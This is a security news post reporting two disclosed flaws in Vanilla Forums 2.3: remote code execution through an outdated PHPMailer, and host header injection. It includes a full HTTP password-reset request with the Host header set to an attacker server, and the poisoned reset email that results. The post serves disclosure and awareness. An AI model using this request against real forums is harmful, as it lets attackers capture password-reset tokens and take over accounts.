Vanilla Forums is affected by a remote code execution vulnerability!

Dawid Golunski of Legal Hackers has publicly disclosed two critical flaws in Vanilla Forums, the first vulnerability is a remote code execution (CVE-2016-10033) and the second vulnerability is a host header injection (CVE-2016-10073). The vulnerabilities affect the latest version (Vanilla 2.3).

Vanilla is forum software that powers discussions on hundreds of thousands of sites. Built for flexibility and integration, Vanilla is the best, most powerful community solution in the world.

Remote code execution (CVE-2016-10033):
The vulnerabilities exist because Vanilla software is still using a vulnerable version of PHPMailer (an open source PHP libraries used to send emails).
Golunski explained that the PHPMailer exploit makes the Vanilla Forums vulnerable, and it can be used with host header injection to allow attackers to inject arbitrary commands.


Host header injection (CVE-2016-10073):
An attacker may use HTTP HOST header to set the email domain to an arbitrary host. For example, sending the following HTTP request:

POST /vanilla2-3/entry/passwordrequest HTTP/1.1
Host: attackers_server
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Content-Length: 149

hpt=&Target=discussions&ClientHour=2017-05-10+22:00&Email=victim&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON

 

will result in the following email sent to the victim:

 

To: victim@victim-server.com
Subject: [Vanilla 2.3] Reset Your Password
X-PHP-Originating-Script: 0:class.phpmailer.php
Date: Thu, 11 May 2017 09:42:13 +0000
Return-Path: noreply@attackers_server
Message-ID: <a989e3868a609316dd9a7d7a991d79e5@attackers_server>
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="utf-8"

Vanilla 2.3 http://attackers_server/vanilla2-3/=0A=0A=0A=0AReset Your Passw=
ord=0A=0A=0A=0AWe've received a request to change your password at Vanilla =
2.3. If you didn't make this request, please ignore this email.=0A=0A=0A=0A=
Change My Password: http://attackers_server/vanilla2-3/entry/passwordreset/=
2/PdNvqaPnnFaG

The HOST header set to:
Host: attackers_server

The email will have the sender’s address set to noreply@attackers_server. The password reset link will also be modified and contain the attacker’s server which could allow the hacker to intercept the hash if the victim user clicked on the modified link.

The vulnerabilities are now patched as reported in the Vanilla forums.

Related posts

Hard-Coded Credentials Vulnerability Found In Kubernetes Image Builder

Critical Vulnerability Patched In Jetpack WordPress Plugin

Microsoft Fixed 100+ Vulnerabilities With October Patch Tuesday